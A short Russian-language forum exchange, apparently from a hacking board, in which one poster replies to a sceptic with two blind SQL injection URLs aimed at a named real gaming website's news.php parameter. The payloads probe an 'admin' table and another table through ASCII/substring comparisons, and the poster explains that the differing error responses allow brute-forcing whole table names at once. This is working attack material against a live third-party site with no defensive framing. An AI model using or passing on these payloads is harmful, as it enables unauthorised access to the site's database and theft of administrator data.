Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает
гы, я не спорю, похоже на бред, конечно, но есть разница таки между:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49
и
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49
насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки
) Но blind-sql-inj есть не только в пятой ветке